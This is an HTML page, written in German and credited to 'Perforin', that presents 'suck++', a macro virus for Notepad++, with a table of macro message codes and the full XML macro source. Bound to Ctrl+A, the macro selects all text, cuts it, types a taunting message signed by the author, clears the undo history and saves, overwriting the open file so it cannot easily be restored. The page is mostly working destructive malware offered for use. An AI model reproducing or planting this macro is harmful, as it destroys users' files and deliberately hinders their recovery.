<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator" content=
"HTML Tidy for Windows (vers 14 February 2006), see www.w3.org" />
<meta http-equiv="Content-Type" content=
"text/html; charset=us-ascii" />
<title>Suck++</title>
</head>
<body>
<hr />
<pre>
<b>[+]</b><u>Topic: Code</u>
<b>[+]</b><u>Von: Perforin</u>
<b>[+]</b><u>Return: <a href=
"javascript:history.back()">Code</a></u>
</pre>
	<hr />
<pre>
suck++ ist ein simpler makro virus f&uuml;r Notepad++
Dabei bestehen die Makros aus einfachen XML Dateien mit
Anweisungen.

In diesem Fall, aktiviert sich das Makro wenn man die
Tastenkombination CTRL + A dr&uuml;ckt. Dann wird die
offene Datei &uuml;berschrieben und gespeichert. Ausserdem
wird die Undo-History gel&ouml;scht, so dass man die Datei
nicht ganz so einfach wieder herstellen kann! :)

Hier habe ich noch eine kleine Liste mit den Bedeutungen
diverser Zahlen in den Makros.

type="0" --> steht f&uuml;r eine Win32 API Anweisung
type="1" --> steht f&uuml;r eine reine Notepad++ Anweisung
type="2" --> steht f&uuml;r eine Scintilla Anweisung

Nun, folgt der Parameter message bzw wParam!

2013  --> CTRL+A
2177  --> CTRL+X
2170  --> Schreiben
2175  --> Undo History l&ouml;schen
41006 --> Speichern
41007 --> Alles speichern

sParam kann mit einem String gef&uuml;llt werden, hat aber
nur einen Effekt in Kombination mit message="2170" !

</pre>
	<hr />

<xmp>
<Macro name="suck++" Ctrl="yes" Alt="no" Shift="no" Key="65">
            <Action type="0" message="2013" wParam="0" lParam="0" sParam="" />
            <Action type="0" message="2177" wParam="0" lParam="0" sParam="" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="W" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="h" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="e" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="n" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam=" " />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="t" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="a" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="l" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="k" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="i" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="n" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="g" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam=" " />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="f" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="a" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="i" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="l" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="s" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="," />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam=" " />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="i" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="t" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="&#x00B4;" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="s" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam=" " />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="t" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="i" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="m" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="e" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam=" " />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="f" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="o" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="r" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam=" " />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="v" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="i" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="o" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="l" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="e" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="n" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="c" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="e" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="." />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="&#x000D;" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="&#x000A;" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="&#x000D;" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="&#x000A;" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="b" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="y" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam=" " />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="P" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="e" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="r" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="f" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="o" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="r" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="i" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="n" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam=" " />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="[" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="V" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="X" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="n" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="e" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="t" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="w" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="0" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="r" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="k" />
            <Action type="1" message="2170" wParam="0" lParam="0" sParam="]" />
            <Action type="0" message="2175" wParam="0" lParam="0" sParam="" />
            <Action type="2" message="0" wParam="41006" lParam="0" sParam="" />
        </Macro>
</xmp>
	
</body>
</html>
